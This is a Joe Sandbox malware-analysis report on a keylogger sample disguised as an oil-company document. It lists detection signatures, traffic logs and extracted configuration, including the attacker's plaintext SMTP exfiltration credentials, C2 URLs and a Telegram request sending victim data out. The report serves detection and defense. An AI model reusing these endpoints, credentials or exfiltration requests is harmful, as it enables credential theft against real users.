Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
_Company.exe

Overview

General Information

Sample name:_Company.exe
renamed because original name is a hash value
Original sample name:QTN_Detailed_Schedule_for_Balance_Activities_in_Terminal_5_Area_By_Abu_Dhabi_National_Oil_Company.exe
Analysis ID:1577705
MD5:aff56992589dfb76554ea1416c3e99d1
SHA1:7a3e430720860af04ca1e8d029f60749cd98812b
SHA256:e5dea0ef10ebb4aa8bb909e2bcbb6efb37b32e3bd9fed8deeed60a3aa6130d06
Tags:exeuser-Racco42
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • _Company.exe (PID: 6080 cmdline: "C:\Users\user\Desktop\_Company.exe" MD5: AFF56992589DFB76554EA1416C3E99D1)
    • _Company.exe (PID: 7100 cmdline: "C:\Users\user\Desktop\_Company.exe" MD5: AFF56992589DFB76554EA1416C3E99D1)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "out@plht365.com", "Password": "Nothing4You@here", "Host": "smtp.hostinger.com", "Port": "587", "Version": "4.4"}
{"Exfil Mode": "SMTP", "Username": "out@plht365.com", "Password": "Nothing4You@here", "Host": "smtp.hostinger.com", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000002.00000002.4647934767.0000000003313000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
    00000001.00000002.4651072247.0000000005760000.00000004.08000000.00040000.00000000.sdmpMALWARE_Win_DLInjector02Detects downloader injectorditekSHen
    • 0x6dc6b:$x1: In$J$ct0r
    00000002.00000002.4647934767.0000000003121000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
          Click to see the 15 entries
          SourceRuleDescriptionAuthorStrings
          1.2._Company.exe.5760000.7.raw.unpackMALWARE_Win_DLInjector02Detects downloader injectorditekSHen
          • 0x6dc6b:$x1: In$J$ct0r
          1.2._Company.exe.5760000.7.unpackMALWARE_Win_DLInjector02Detects downloader injectorditekSHen
          • 0x6be6b:$x1: In$J$ct0r
          1.2._Company.exe.3f4ad70.5.unpackMALWARE_Win_DLInjector02Detects downloader injectorditekSHen
          • 0x6be6b:$x1: In$J$ct0r
          2.2._Company.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            2.2._Company.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              Click to see the 39 entries

              System Summary

              barindex
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 172.65.255.143, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\_Company.exe, Initiated: true, ProcessId: 7100, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49824
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-18T17:07:21.982022+010028033053Unknown Traffic192.168.2.649728104.21.67.152443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-18T17:07:17.949510+010028032742Potentially Bad Traffic192.168.2.649716158.101.44.24280TCP
              2024-12-18T17:07:20.230737+010028032742Potentially Bad Traffic192.168.2.649716158.101.44.24280TCP
              2024-12-18T17:07:23.371363+010028032742Potentially Bad Traffic192.168.2.649736158.101.44.24280TCP
              2024-12-18T17:07:26.402613+010028032742Potentially Bad Traffic192.168.2.649747158.101.44.24280TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: _Company.exeAvira: detected
              Source: 00000002.00000002.4647934767.0000000003121000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "out@plht365.com", "Password": "Nothing4You@here", "Host": "smtp.hostinger.com", "Port": "587", "Version": "4.4"}
              Source: 2.2._Company.exe.400000.0.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "out@plht365.com", "Password": "Nothing4You@here", "Host": "smtp.hostinger.com", "Port": "587", "Version": "4.4"}
              Source: _Company.exeReversingLabs: Detection: 47%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: _Company.exeJoe Sandbox ML: detected

              Location Tracking

              barindex
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: _Company.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.6:49724 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49803 version: TLS 1.2
              Source: _Company.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: _Company.exe, 00000001.00000002.4647497521.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000001.00000002.4650749475.0000000005610000.00000004.08000000.00040000.00000000.sdmp
              Source: C:\Users\user\Desktop\_Company.exeCode function: 4x nop then jmp 0139FC19h2_2_0139F961
              Source: C:\Users\user\Desktop\_Company.exeCode function: 4x nop then jmp 0139F45Dh2_2_0139F2C0
              Source: C:\Users\user\Desktop\_Company.exeCode function: 4x nop then jmp 0139F45Dh2_2_0139F4AC
              Source: C:\Users\user\Desktop\_Company.exeCode function: 4x nop then jmp 05562C19h2_2_05562968
              Source: C:\Users\user\Desktop\_Company.exeCode function: 4x nop then jmp 055631E0h2_2_05562DC8
              Source: C:\Users\user\Desktop\_Company.exeCode function: 4x nop then jmp 05560D0Dh2_2_05560B30
              Source: C:\Users\user\Desktop\_Company.exeCode function: 4x nop then jmp 05561697h2_2_05560B30
              Source: C:\Users\user\Desktop\_Company.exeCode function: 4x nop then jmp 0556D7F9h2_2_0556D550
              Source: C:\Users\user\Desktop\_Company.exeCode function: 4x nop then jmp 055631E0h2_2_0556310E
              Source: C:\Users\user\Desktop\_Company.exeCode function: 4x nop then jmp 0556DC51h2_2_0556D9A8
              Source: C:\Users\user\Desktop\_Company.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_05560853
              Source: C:\Users\user\Desktop\_Company.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_05560040
              Source: C:\Users\user\Desktop\_Company.exeCode function: 4x nop then jmp 0556FAB9h2_2_0556F810
              Source: C:\Users\user\Desktop\_Company.exeCode function: 4x nop then jmp 0556D3A1h2_2_0556D0F8
              Source: C:\Users\user\Desktop\_Company.exeCode function: 4x nop then jmp 0556CF49h2_2_0556CCA0
              Source: C:\Users\user\Desktop\_Company.exeCode function: 4x nop then jmp 0556F209h2_2_0556EF60
              Source: C:\Users\user\Desktop\_Company.exeCode function: 4x nop then jmp 0556EDB1h2_2_0556EB08
              Source: C:\Users\user\Desktop\_Company.exeCode function: 4x nop then jmp 0556F661h2_2_0556F3B8
              Source: C:\Users\user\Desktop\_Company.exeCode function: 4x nop then jmp 0556E501h2_2_0556E258
              Source: C:\Users\user\Desktop\_Company.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_05560673
              Source: C:\Users\user\Desktop\_Company.exeCode function: 4x nop then jmp 0556E0A9h2_2_0556DE00
              Source: C:\Users\user\Desktop\_Company.exeCode function: 4x nop then jmp 0556E959h2_2_0556E6B0

              Networking

              barindex
              Source: unknownDNS query: name: api.telegram.org
              Source: Yara matchFile source: 2.2._Company.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2._Company.exe.4087840.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2._Company.exe.4043e10.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2._Company.exe.3f4ad70.5.raw.unpack, type: UNPACKEDPE
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20and%20Time:%2019/12/2024%20/%2015:38:12%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20377142%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
              Source: Joe Sandbox ViewIP Address: 104.21.67.152 104.21.67.152
              Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
              Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownDNS query: name: checkip.dyndns.org
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49716 -> 158.101.44.242:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49736 -> 158.101.44.242:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49747 -> 158.101.44.242:80
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49728 -> 104.21.67.152:443
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.6:49724 version: TLS 1.0
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20and%20Time:%2019/12/2024%20/%2015:38:12%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20377142%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
              Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
              Source: global trafficDNS traffic detected: DNS query: smtp.hostinger.com
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 18 Dec 2024 16:07:45 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
              Source: _Company.exe, 00000002.00000002.4647934767.0000000003313000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
              Source: _Company.exe, 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
              Source: _Company.exe, 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.0000000003121000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
              Source: _Company.exe, 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.0000000003121000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
              Source: _Company.exe, 00000002.00000002.4647934767.0000000003121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
              Source: _Company.exe, 00000002.00000002.4647934767.0000000003121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
              Source: _Company.exe, 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
              Source: _Company.exe, 00000002.00000002.4647934767.0000000003121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: _Company.exe, 00000002.00000002.4647934767.0000000003313000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.000000000332B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://smtp.hostinger.com
              Source: _Company.exe, 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.0000000003121000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
              Source: _Company.exe, 00000002.00000002.4651641418.0000000004141000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4651641418.000000000442D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: _Company.exe, 00000002.00000002.4647934767.0000000003208000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
              Source: _Company.exe, 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.0000000003208000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
              Source: _Company.exe, 00000002.00000002.4647934767.0000000003208000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
              Source: _Company.exe, 00000002.00000002.4647934767.0000000003208000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20a
              Source: _Company.exe, 00000002.00000002.4651641418.0000000004141000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4651641418.000000000442D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: _Company.exe, 00000002.00000002.4651641418.0000000004141000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4651641418.000000000442D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: _Company.exe, 00000002.00000002.4651641418.0000000004141000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4651641418.000000000442D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: _Company.exe, 00000002.00000002.4647934767.00000000032B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
              Source: _Company.exe, 00000002.00000002.4647934767.00000000032B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
              Source: _Company.exe, 00000002.00000002.4651641418.0000000004141000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4651641418.000000000442D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: _Company.exe, 00000002.00000002.4651641418.0000000004141000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4651641418.000000000442D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: _Company.exe, 00000002.00000002.4651641418.0000000004141000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4651641418.000000000442D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: _Company.exe, 00000002.00000002.4647934767.0000000003208000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.000000000316F000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.00000000031DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
              Source: _Company.exe, 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.000000000316F000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
              Source: _Company.exe, 00000002.00000002.4647934767.0000000003199000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
              Source: _Company.exe, 00000002.00000002.4647934767.0000000003208000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.0000000003199000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
              Source: _Company.exe, 00000002.00000002.4651641418.0000000004141000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4651641418.000000000442D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: _Company.exe, 00000002.00000002.4651641418.0000000004141000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4651641418.000000000442D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: _Company.exe, 00000002.00000002.4647934767.00000000032E8000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.00000000032D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
              Source: _Company.exe, 00000002.00000002.4647934767.00000000032E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
              Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
              Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49803 version: TLS 1.2

              System Summary

              barindex
              Source: 1.2._Company.exe.5760000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
              Source: 1.2._Company.exe.5760000.7.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
              Source: 1.2._Company.exe.3f4ad70.5.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
              Source: 2.2._Company.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2._Company.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
